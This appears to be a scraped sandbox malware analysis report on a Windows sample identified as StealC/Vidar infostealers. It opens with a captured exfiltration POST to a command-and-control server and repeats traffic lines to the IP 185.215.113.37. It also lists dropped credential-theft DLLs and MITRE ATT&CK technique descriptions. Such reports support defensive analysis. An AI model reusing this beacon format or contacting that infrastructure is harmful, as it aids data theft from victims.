0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 45 2d 2d 0d 0a Data Ascii: ------CFBFHIEBKJKFHIEBFBAEContent-Disposition: form-data; name="token"33e086dd6b6d0d5a02ce940364c74aad6cc66474f217f3c896c9cb38efdad6947b5d0b63------CFBFHIEBKJKFHIEBFBAEContent-Disposition: form-data; name="message"wkkjqaiaxkhb------CFBFHIEBKJKFHIEBFBAE--

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\CAAAAFBKFIECAAKECGCAAKJECB

C:\ProgramData\CFBFHIEB

C:\ProgramData\DGCBAFIJDGHCAKECAEGC

C:\ProgramData\DGDBKFBAKFBFHIECFBFIJKJKKF

C:\ProgramData\HIIIDAKKJJJKKECAKKJEGHCBKJ

C:\ProgramData\JDGIECGIEBKJJJJKEGHJJJKEBA

C:\ProgramData\JKFIDGDH

C:\ProgramData\KFIJJEGHDAEBGCAKJKFH

C:\ProgramData\KKKEBKJJDGHCBGCAAKEH

C:\ProgramData\freebl3.dll

C:\ProgramData\mozglue.dll

C:\ProgramData\msvcp140.dll

Windows Analysis Report
file.exe

Function 000B9860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Function 000A45C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148
memoryCOMMON

Function 000ABE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Function 6C6535A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Function 000B4910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Function 000B9C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Function 000A7710 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Function 000B0250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366
stringmemoryCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre